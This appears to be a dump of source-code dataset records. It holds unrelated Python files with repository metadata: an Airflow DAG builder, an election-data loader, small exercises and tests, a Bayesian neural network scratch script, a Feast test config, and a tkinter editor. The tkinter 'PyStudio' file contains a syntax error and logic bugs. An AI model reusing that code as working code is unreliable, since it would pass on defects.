template_filename = 'subdag_operator.j2'
else:
template_filename = 'operator.j2'
template = self.get_jinja_template(template_filename)
# Do not set upstream/downstream dependencies that involve generator nodes
# at this stage; those are all set within the generator nodes, and if they are
# set here, there will be python errors due to references to operators that
# do not exist (generators do not correspond to operators)
generator_nodes = frozenset(
gen.name for gen in self.graph.graph.nodes
if gen.type == NodeTypes.GENERATOR)
upstream_deps = frozenset(
dep.name for dep in self.graph.upstream_dependency_set(node))
if generator_nodes & upstream_deps:
logger.debug(
'Not passing upstream generator dependencies `%s` to '
'operator template for node `%s`',
generator_nodes & upstream_deps,
node.name)
downstream_deps = frozenset(
dep.name for dep in self.graph.downstream_dependency_set(node))
if generator_nodes & downstream_deps:
logger.debug(
'Not passing downstream generator dependencies `%s` to '
'operator template for node `%s`',
generator_nodes & downstream_deps,
node.name)
return template.render(
node=node,
args=node.operator_args,
upstream_dependencies=list(upstream_deps - generator_nodes),
downstream_dependencies=list(downstream_deps - generator_nodes),
)
def get_secondary_dag(self, target):
hits = [dag for dag in self.specs.parsed.secondary
if dag['name'] == target]
if not hits:
raise ValueError('Secondary dag id {} not found'.format(target))
if len(hits) > 1:
raise ValueError(
'Multiple hits for secondary dag id {}'.format(target))
return hits[0]
def get_secondary_graph(self, target):
""" Get the graph corresponding to the target. This is kind of ugly,
a consequence of the way in which we currently store dags separately
from graphs. Ideally there would be only one of the two methods,
get_secondary_(dag|graph).
"""
self.get_secondary_dag(target) # does the checking
for (idx, dag) in enumerate(self.specs.parsed.secondary):
if dag['name'] == target:
return self.specs.graphs.secondary[idx]
raise Exception("should not be possible")
def get_target_builder_cls(self, node_type):
if node_type == NodeTypes.GENERATOR:
if not self.generator_builder:
raise Exception('No generator builder is defined!')
return self.generator_builder
elif node_type == NodeTypes.SUBDAG:
if not self.sub_dag_builder:
raise Exception('No sub_dag builder is defined!')
return self.sub_dag_builder
raise Exception(
'Node type `{}` has no known target builder'.format(
node_type))
def render_target(self, node):
builder = self.get_target_builder_cls(node.type)(
dag=self.get_secondary_dag(node.target),
graph=self.get_secondary_graph(node.target),
reference_path=self.reference_path + [node.name],
specs=self.specs,
referring_node=node,
sub_dag_builder=self.sub_dag_builder,
generator_builder=self.generator_builder,
)
return builder.build()
def build(self):
# Keep track of which subdag and generator targets have been rendered.
# These targets can be reused by multiple referring nodes.
rendered_targets = set()
# We build the result by appending components to an array and then
# joining together at the end
components = [self.preamble()]
# generators are rendered last, because they refer to both upstream and
# downstream components when they express their dependencies
generator_components = []
for node in self.graph.ordered():
operator = None
if node.type in set([NodeTypes.GENERATOR, NodeTypes.SUBDAG]) \
and node.target not in rendered_targets:
operator = '\n'.join([
self.render_target(node),
self.render_operator(node)])
rendered_targets.add(node.target)
elif node.type in NodeTypes:
operator = self.render_operator(node)
else:
raise Exception(
'Unrecognized operator type: {}'.format(node.type))
# add the rendered operator to the appropriate components list
(components if node.type != NodeTypes.GENERATOR else generator_components).append(
util.add_leading_spaces(
operator,
1 if self.indent_operators else 0))
components += generator_components
components.append(self.epilogue())
return '\n'.join(filter(None, components))
| [
"[email protected]"
]
| |
985dad9eac8bbe27fa5b3adfb04734809e871ce4 | ae16f9dd815605e5f52f27dda77bd735abafb587 | /parser/councilors/elections_config.py | 1bf0e2a7db9c45f4024b1026e1cd6c38e1f368c0 | [
"CC0-1.0"
]
| permissive | travishen/councilor-voter-guide | aa4a1aa3b86db9ca40b291baf461ff0330a369c0 | 09d9365676335854b2d4d0981f5cb925adf4c958 | refs/heads/master | 2020-04-13T10:09:07.688276 | 2018-11-28T14:51:05 | 2018-11-28T14:51:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,827 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.append('../')
import re
import json
import psycopg2
import ast
from sys import argv
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import db_settings
conn = db_settings.con()
c = conn.cursor()
election_year = ast.literal_eval(argv[1])['election_year']
def parse_districts(county, districts):
districts = re.sub(u'^(居住|【)', '', districts)
category = re.search(u'(平地原住民|山地原住民)$', districts)
districts = re.sub(u'(平地原住民|山地原住民)$', '', districts)
if category:
category = category.group()
districts = re.sub(u'(】|之)', '', districts)
l = []
if districts:
for district in districts.split(u'、'):
if len(district) == 2:
l = districts.split(u'、')
break
if not re.search(re.sub(u'[縣市]$', '', county), district):
district = re.sub(u'[鄉鎮市區]$', '', district)
l.append(district)
return l, category
# update constituencies
constituencies = json.load(open('../../voter_guide/static/json/dest/constituencies_%s.json' % election_year))
counties = {}
for region in constituencies:
if region['county'] not in counties.keys():
counties.update({
region['county']: {
'regions': [],
'duplicated': []
}
})
districts_list, category = parse_districts(region['county'], region['district'])
if category:
if districts_list:
district = u'%s(%s)' % (category, u'、'.join(districts_list))
else:
district = u'%s(%s)' % (category, u'全%s' % region['county'])
else:
district = u'、'.join(districts_list)
counties[region['county']]['regions'].append({
'constituency': region['constituency'],
'districts_list': districts_list,
'district': district,
'category': category
})
c.execute('''
update candidates_terms
set district = %s
where election_year = %s and county = %s and constituency = %s
''', (district, election_year, region['county'], region['constituency']))
scope = ['https://spreadsheets.google.com/feeds']
credentials = ServiceAccountCredentials.from_json_keyfile_name('credential.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open_by_key('10zFDmMF9CJDXSIENXO8iJXKE5CLBY62i_mSeqe_qDug')
worksheets = sh.worksheets()
for wks in worksheets:
rows = wks.get_all_records()
if wks.title == u'議員':
for row in rows:
print row['county'], row['constituency']
if row['count_this']:
counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count_pre'] = row['count_pre']
counties[row['county']]['regions'][int(row['constituency'])-1]['elected_count'] = row['count_this']
counties[row['county']]['regions'][int(row['constituency'])-1]['reserved_seats'] = row['reserved_seats']
else:
continue
config = json.dumps({'constituencies': counties})
c.execute('''
INSERT INTO elections_elections(id, data)
VALUES (%s, %s)
ON CONFLICT (id)
DO UPDATE
SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
# update constituency_change
district_versions = json.load(open('../district_versions.json'))
config = json.dumps({'constituency_change': district_versions.get(election_year, {})})
c.execute('''
INSERT INTO elections_elections(id, data)
VALUES (%s, %s)
ON CONFLICT (id)
DO UPDATE
SET data = (COALESCE(elections_elections.data, '{}'::jsonb) || %s::jsonb)
''', [election_year, config, config])
conn.commit()
| [
"[email protected]"
]
| |
ee8d4a24f7c6068b54efb883495622825593dcad | 065694179b7a132d989c373573a0e89686cc2c8c | /untitled/venv/include/task1.py | 9fcae00b5f7e63cef0d7248881b10293e65e6e5b | []
| no_license | vksychev/PythonPlayground | ff267b1173f43cae2d11634b70e75c0aa3f715aa | 99c4c1471b4e3e5a528486a58bd92cfd42b33c0e | refs/heads/master | 2020-03-21T06:11:23.144147 | 2018-12-27T14:56:07 | 2018-12-27T14:56:07 | 138,204,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | import math
def genA(n):
a = []
for i in range(n):
new_element = i
a.append(math.sin(new_element))
return a
def solution(A):
direction = 0
cur_direction = 0
count = 0
for i in range(len(A) - 1):
if A[i] < A[i + 1]:
cur_direction = 1
if direction != cur_direction:
direction = cur_direction
count += 1
elif A[i] > A[i + 1]:
cur_direction = -1
if direction != cur_direction:
direction = cur_direction
count += 1
return count + 1
def main():
A = [1, 2, 1, 2, 1, 2, 1, 2]
print(solution(A))
if (__name__ == "__main__"):
main()
| [
"[email protected]"
]
| |
47cb81c305f5950abd06d4b86fb817c6ec52f5fa | 1d9ad7aa473191dad19a64b8a72a4677db221e93 | /main.py | 62666cef8f1456cdbb69389b0e988ba4da7db633 | []
| no_license | ethicalhacker7217/PyStudio | 1884329209ec487f95300ee30521a51761d5bc3c | 176756fa396d3156803b400ffac2c5ac658a27cc | refs/heads/main | 2023-04-25T07:00:09.446229 | 2021-05-15T05:20:09 | 2021-05-15T05:20:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,752 | py | from tkinter import *
from tkinter.filedialog import asksaveasfile,askopenfilename
import subprocess
compiler = Tk()
compiler.title('PyStudio')
File_path = ''
def set_file_path(path):
global File_path()
File_path = path
def run():
if File_path == '':
save_prompt = Toplevel()
text = Label(save_prompt, text='Please save your code')
text.pack()
command = f'python{File_path}'
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True )
output, error = process.communicate()
code_output.insert('1.0', output)
code_output.insert('1.0', error)
def Save_as():
if File_path == '':
path = asksaveasfile(filetypes=['Python Files','*.py'])
else:
path = File_path
with open(path,'w') as file:
code = editor.get('1.0',END)
file.write(code)
set_file_path(path)
def Open():
path = askopenfilename(filetypes=['Python Files','*.py'])
with open(path,'r') as file:
code = editor.get('1.0',END)
file.read()
editor.delete('1.0',END)
editor.insert('1.0', code)
set_file_path(path)
menu_bar = Menu(compiler)
file_menu = Menu(menu_bar, tearoff=0)
file_menu.add_command(label='Open', command=Open)
file_menu.add_command(label='Save', command=Save_as)
file_menu.add_command(label='Save As', command=Save_as)
file_menu.add_command(label='Exit', command=exit)
menu_bar.add_cascade(label = 'File', menu=file_menu)
run_bar = Menu(menu_bar, tearoff=0)
run_bar.add_command(label='Run', command=run)
menu_bar.add_cascade(label='Run', menu=run_bar)
compiler.config(menu=menu_bar)
editor = Text()
editor.pack()
code_output = Text(height=7)
code_output.pack
compiler.mainloop()
| [
"[email protected]"
]
| |
3f37df8301b6e1dbb044c648cb837c0f03ffdbc6 | a1582cec6239f627c6740b391d751f429675ee39 | /test_todo.py | 039a3c22c18438751c553f7c5c877b02e940182e | []
| no_license | SolbiatiAlessandro/todos | 7cabfd35d6c7d3cdd3232051be4a96c667d55f21 | b85e74c4fc220dccc5a0a05a288465b2da98f6d0 | refs/heads/master | 2020-03-28T18:56:09.847298 | 2018-10-15T15:07:01 | 2018-10-15T15:07:01 | 148,928,531 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | import unittest
import todo
from os import path
dir_path = path.dirname(path.realpath(__file__))
class testTODO( unittest.TestCase ):
def test_readElems( self ):
self.assertIsNotNone( todo.readElems() )
def test_todoDone( self ):
with open(dir_path+'/todos','a') as f:
f.write('"[test elem]" 0')
#import pdb;pdb.set_trace()
elems = todo.readElems()
self.assertEqual( "[test elem]", elems[0][1] )
todo.todoDone()
elems = todo.readElems()
self.assertNotEqual( "[test elem]", elems[0][1] )
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
74c6e22e10d24f80e71b7232533ed388186eeff9 | 6ecbf084f558b37f0cee51c7226c1e116b5aa7bf | /scratch/bnn.py | aac4b4b2e7b7f9d26c1dc0798692c2967766ade1 | []
| no_license | reichlab/bayesian_non_parametric | 364b12ad07b09e9a4386572bd47c709ad7629497 | c8d7eb7493addb919b8f7159768dc732ce1a1f35 | refs/heads/master | 2021-01-01T06:43:10.176687 | 2018-03-25T14:33:32 | 2018-03-25T14:33:32 | 97,492,688 | 2 | 0 | null | 2018-01-02T15:23:21 | 2017-07-17T15:38:01 | Python | UTF-8 | Python | false | false | 8,338 | py | from __future__ import absolute_import
from __future__ import print_function
import matplotlib.pyplot as plt
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd import grad
from sklearn.preprocessing import scale
from autograd.optimizers import adam
def black_box_variational_inference(logprob, D, num_samples):
"""Implements http://arxiv.org/abs/1401.0118, and uses the
local reparameterization trick from http://arxiv.org/abs/1506.02557"""
def unpack_params(params):
# Variational dist is a diagonal Gaussian.
mean, log_std = params[:D], params[D:]
return mean, log_std
def gaussian_entropy(log_std):
return 0.5 * D * (1.0 + np.log(2*np.pi)) + np.sum(log_std)
rs = npr.RandomState(0)
def variational_objective(params, t):
"""Provides a stochastic estimate of the variational lower bound."""
mean, log_std = unpack_params(params)
samples = rs.randn(num_samples, D) * np.exp(log_std) + mean
lower_bound = gaussian_entropy(log_std) + np.mean(logprob(samples, t))
return -lower_bound
gradient = grad(variational_objective)
return variational_objective, gradient, unpack_params
def make_nn_funs(layer_sizes, L2_reg, noise_variance, nonlinearity=np.tanh):
"""These functions implement a standard multi-layer perceptron,
vectorized over both training examples and weight samples."""
shapes = list(zip(layer_sizes[:-1], layer_sizes[1:]))
num_weights = sum((m+1)*n for m, n in shapes)
def unpack_layers(weights):
num_weight_sets = len(weights)
for m, n in shapes:
yield weights[:, :m*n] .reshape((num_weight_sets, m, n)),\
weights[:, m*n:m*n+n].reshape((num_weight_sets, 1, n))
weights = weights[:, (m+1)*n:]
def predictions(weights, inputs):
"""weights is shape (num_weight_samples x num_weights)
inputs is shape (num_datapoints x D)"""
inputs = np.expand_dims(inputs, 0)
for W, b in unpack_layers(weights):
outputs = np.einsum('mnd,mdo->mno', inputs, W) + b
inputs = nonlinearity(outputs)
return outputs
def logprob(weights, inputs, targets):
log_prior = -L2_reg * np.sum(weights**2, axis=1)
preds = predictions(weights, inputs)
log_lik = -np.sum((preds - targets)**2, axis=1)[:, 0] / noise_variance
return log_prior + log_lik
return num_weights, predictions, logprob
def build_toy_dataset(n_data=40, noise_std=0.1):
D = 1
rs = npr.RandomState(0)
inputs = np.concatenate([np.linspace(0, 2, num=n_data/2),
np.linspace(6, 8, num=n_data/2)])
targets = np.cos(inputs) + rs.randn(n_data) * noise_std
inputs = (inputs - 4.0) / 4.0
inputs = inputs.reshape((len(inputs), D))
targets = targets.reshape((len(targets), D))
return inputs, targets
if __name__ == '__main__':
# Specify inference problem by its unnormalized log-posterior.
rbf = lambda x: np.exp(-x**2)
relu = lambda x: np.maximum(x, 0.)
num_weights, predictions, logprob = \
make_nn_funs(layer_sizes=[1, 20, 20, 1], L2_reg=0.001,
noise_variance=0.01, nonlinearity=rbf)
inputs, targets = build_toy_dataset()
data__full = [4,5,4,3,6,2,4,5,10,6,8,2,6,17,23,13,21,28,24,20,40,27,42,33,43,37,57,71,44,56,53,52,47,26,27,21,21,26,34,37,17,19,25,18,21,17,17,16,16,15,23,16,17,12,17,10,15,19,21,14,18,13,14,18,23,25,62,60,76,66,64,68,89,92,140,116,142,129,140,140,127,129,169,141,108,78,70,81,104,90,85,55,53,65,33,38,59,40,37,29,30,30,28,23,24,29,26,23,20,19,20,26,29,31,28,26,32,35,33,30,52,59,67,65,74,70,61,53,76,61,57,44,34,47,60,60,53,36,31,30,32,28,33,33,35,22,13,13,21,17,11,8,8,6,6,7,12,17,10,10,18,19,12,22,12,21,18,16,16,22,17,25,23,12,25,28,27,18,23,23,29,38,36,43,46,31,25,40,31,38,30,22,31,26,35,36,39,25,31,37,33,25,24,18,23,13,18,14,17,22,13,24,31,34,31,31,38,49,42,49,55,80,84,72,89,115,179,202,272,302,395,426,461,381,333,353,410,364,359,288,221,149,112,154,91,72,56,46,37,26,17,17,20,11,7,16,14,16,5,2,6,5,4,3,4,16,8,7,10,14,7,9,11,23,17,19,24,17,28,40,33,31,33,29,30,36,48,40,28,36,19,34,23,17,17,23,14,20,13,23,20,16,16,23,14,15,4,5,5,11,11,7,4,6,5,2,4,2,4,6,6,4,6,11,16,9,12,13,27,21,19,17,24,27,30,29,25,35,33,30,29,31,29,22,27,24,26,29,22,33,24,30,20,17,24,28,18,13,9,14,11,11,19,10,8,8,9,3,7,14,4,9,14,7,9,3,3,14,12,10,21,26,47,42,31,34,33,52,56,70,112,70,47,48,49,66,56,61,67,64,68,49,50,56,75,63,62,41,50,34,31,38,30,32,26,30,36,35,46,48,44,51,59,71,102,128,127,150,191,256,329,263,220,204,181,99,54,80,102,127,73,68,64,55,67,84,85,67,73,89,68,59,56,77,75,47,50,42,28,37,37,27,12,15,22,8,15,17,10,9,11,20,13,11,16,11,7,17,14,13,15,30,25,40,44,25,21,48,56,60,45,55,32,46,61,42,37,43,34,40,25,16,17,17,16,23,18,18,9,7,7,4,3,2,8,3,1,1,2,3,3,2,0,0,2,2,0,6,3,6,2,3,2,4,5,2,9,2,4,8,6,3,11,14,15,20,9,20,28,38,30,30,23,16,22,28,14,17,20,17,10,13,20,9,18,9,8,19,11,4,6,6,8,13,8,8,5,16,12,11,18,10,22,14,16,18,27,38,35,41,51,65,55,54,62,64,56,65,71,75,71,72,47,27,35,25,19,37,38,34,26,19,18,22,16,18,6,12,6,6,3,7,6,1,3,2,2,1,10,3,3,1,1,2,6,3,3,5,4,7,6,5,7,6,4,4,7,9,5,5,10,6,13,6,5,5,9,3,6,11,7,7,15,9,6,6,6,7,10,8,7,12,3,2,7,5,5,7,7,7,7,10,13,10,14,11,20,25,17,18,25,21,31,32,26,35,28,37,41,34,30,39,39,39,34,30,37,29,26,15,22,15,20,14,10,21,14,14,9,11,5,6,7,11,4,3,2,6,10,7,5,3,12,13,10,13,13,8,21,18,8,7,20,14,14,7,14,10,13,27,13,18,16,16,20,17,4,15,8,6,12,15,11,10,15,17,7,7,8,9,12,12,5,4,11,4,5,7,1,1,4,2,6,3,4,10,12,21,26,21,30,45,56,75,83,82,126,119,137,131,112,82,73,43,55,55,53,46,43,29,22,26,13,17,8,13,10,17,19,9,9,9,3,7,7,0,2,3,3,1,3,3,3,7,3,5,11,5,5,6,6,4,4,8,14,12,16,10,16,18,15,23,17,33,15,13,11,14,17,19,20,12,21,7,19,10,13,10,8,21,11,9,14,14,15,18,16,12,20,8,3,13,4,1,10,8,13,10,21,18,21,34,25,34,33,40,42,36,72,75,76,92,71,112,106,101,170,135,106,68,48,48,26,33,29,17,12,13,17,15,14,15,10,9,2,6,8,5,1,2,3,4,3,1,3,5,2,3,2,3,2,2,3,4,3,4,4,4,7,6,15,11,9,9,12,13,13,13,20,28,45,28,34,41,36,38,48,27,23,28,42,30,18,38,28,36,44,41,35,28,28,22,26,24,9,21,10,15]
#data__full = np.array(data__full)/np.max(data__full).tolist()
from sklearn.cluster import KMeans
data__full = scale(data__full)
data__ = data__full[:50]
m = 1
train_target = []
train_data = []
test_data = []
test_target = []
for i in range(1,len(data__)):
train_data.append(data__[i-1])
train_target.append(data__[i])
print (np.array(train_data).shape)
X_train = X_test = np.array(train_data,dtype=np.float32).reshape((-1,1))
y_train = y_test = np.array(train_target,dtype=np.float32).reshape((-1))
inputs = X_train
targets = y_train
log_posterior = lambda weights, t: logprob(weights, X_train, y_train)
# Build variational objective.
objective, gradient, unpack_params = \
black_box_variational_inference(log_posterior, num_weights,
num_samples=20)
# Set up figure.
fig = plt.figure(figsize=(12, 8), facecolor='white')
ax = fig.add_subplot(111, frameon=False)
plt.ion()
plt.show(block=False)
def callback(params, t, g):
print("Iteration {} lower bound {}".format(t, -objective(params, t)))
# Sample functions from posterior.
rs = npr.RandomState(0)
mean, log_std = unpack_params(params)
#rs = npr.RandomState(0)
sample_weights = rs.randn(10, num_weights) * np.exp(log_std) + mean
plot_inputs = data__full[49:60]
plot_inputs = np.linspace(0, 100, num=400)
outputs = predictions(sample_weights, np.expand_dims(inputs.ravel(), 1))
plt.cla()
ax.plot(inputs.ravel(), targets.ravel(), 'bx')
ax.plot(inputs.ravel(), outputs[:, :, 0].T)
ax.set_ylim([-2, 2])
ax.set_xlim([-2, 2])
plt.draw()
plt.pause(1.0/60.0)
# Plot data and functions.
# Initialize variational parameters
rs = npr.RandomState(0)
init_mean = rs.randn(num_weights)
init_log_std = -5 * np.ones(num_weights)
init_var_params = np.concatenate([init_mean, init_log_std])
print("Optimizing variational parameters...")
variational_params = adam(gradient, init_var_params,
step_size=0.1, num_iters=1000, callback=callback) | [
"[email protected]"
]
| |
762b157f8689129dbb59a301f005e5c667ff34f1 | 9fe97e356baf38e92a46553a5eb21d6f0942ec14 | /cluster/sdk/tests/e2e/conftest.py | 534468ccc96285a9421e6e2bca799c442ed25e02 | [
"LicenseRef-scancode-generic-cla",
"MIT"
]
| permissive | ezwiefel/feast-azure | 1adbd9c3a12577c42164e7536d4afed6096a8e3c | ae94e7232439559205d5e1e84217d8274e3d2f3b | refs/heads/main | 2023-08-27T00:43:26.233519 | 2021-11-04T10:53:01 | 2021-11-04T10:53:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,696 | py | import os
import pytest
def pytest_addoption(parser):
parser.addoption("--core-url", action="store", default="localhost:6565")
parser.addoption("--serving-url", action="store", default="localhost:6566")
parser.addoption("--job-service-url", action="store", default="localhost:6568")
parser.addoption("--kafka-brokers", action="store", default="localhost:9092")
parser.addoption(
"--env", action="store", help="local|aws|gcloud|k8s|synapse", default="local"
)
parser.addoption("--with-job-service", action="store_true")
parser.addoption("--staging-path", action="store")
parser.addoption("--dataproc-cluster-name", action="store")
parser.addoption("--dataproc-region", action="store")
parser.addoption("--emr-cluster-id", action="store")
parser.addoption("--emr-region", action="store")
parser.addoption("--dataproc-project", action="store")
parser.addoption("--dataproc-executor-instances", action="store", default="2")
parser.addoption("--dataproc-executor-cores", action="store", default="2")
parser.addoption("--dataproc-executor-memory", action="store", default="2g")
parser.addoption("--k8s-namespace", action="store", default="sparkop-e2e")
parser.addoption("--azure-synapse-dev-url", action="store", default="")
parser.addoption("--azure-synapse-pool-name", action="store", default="")
parser.addoption("--azure-synapse-datalake-dir", action="store", default="")
parser.addoption("--azure-blob-account-name", action="store", default="")
parser.addoption("--azure-blob-account-access-key", action="store", default="")
parser.addoption("--ingestion-jar", action="store")
parser.addoption("--redis-url", action="store", default="localhost:6379")
parser.addoption("--redis-cluster", action="store_true")
parser.addoption("--feast-version", action="store")
parser.addoption("--bq-project", action="store")
parser.addoption("--feast-project", action="store", default="default")
parser.addoption("--statsd-url", action="store", default="localhost:8125")
parser.addoption("--prometheus-url", action="store", default="localhost:9102")
parser.addoption("--enable-auth", action="store_true")
parser.addoption(
"--scheduled-streaming-job",
action="store_true",
help="When set tests won't manually start streaming jobs,"
" instead jobservice's loop is responsible for that",
)
def pytest_runtest_setup(item):
env_names = [mark.args[0] for mark in item.iter_markers(name="env")]
if env_names:
if item.config.getoption("env") not in env_names:
pytest.skip(f"test requires env in {env_names}")
from .fixtures.base import project_root, project_version # noqa
from .fixtures.client import ( # noqa
feast_client,
feast_spark_client,
global_staging_path,
ingestion_job_jar,
local_staging_path,
tfrecord_feast_client,
)
if not os.environ.get("DISABLE_SERVICE_FIXTURES"):
from .fixtures.services import ( # noqa
kafka_port,
kafka_server,
redis_server,
statsd_server,
zookeeper_server,
)
else:
from .fixtures.external_services import ( # type: ignore # noqa
kafka_server,
redis_server,
statsd_server,
)
if not os.environ.get("DISABLE_FEAST_SERVICE_FIXTURES"):
from .fixtures.feast_services import * # type: ignore # noqa
from .fixtures.services import postgres_server # noqa
else:
from .fixtures.external_services import ( # type: ignore # noqa
feast_core,
feast_serving,
feast_jobservice,
enable_auth,
)
from .fixtures.data import * # noqa
| [
"[email protected]"
]
| |
5fbc95af27e8f02dbba38eac2683c62ebb6d0c35 | 3a6ab03da2f7ec1069c80f23c2ed6e2108ecb0ff | /urllib_urlopen.py | a8567af89b4f9558c14308f49467b82ed5562da0 | []
| no_license | lyletzzzw/pyAPIExample | 01604c0bc0f3df2b20b229873d25493d191d3e99 | 3760789f5d485774d86c469aa221ca6d8c2dba2c | refs/heads/master | 2021-01-17T17:06:33.730266 | 2012-08-05T13:06:18 | 2012-08-05T13:06:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | #! /usr/bin/env python
#coding=utf-8
import urllib
'''
sock = urllib.urlopen('http://diveintopython.org')
html1 = sock.info()
html2 = sock.read()
sock.close()
print html1
print html2
'''
print '--------------------------------------------'
data=urllib.urlencode({'wd':'AAA'})
print data
sock = urllib.urlopen('http://www.baidu.com',data)
html = sock.read()
sock.close()
print html
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.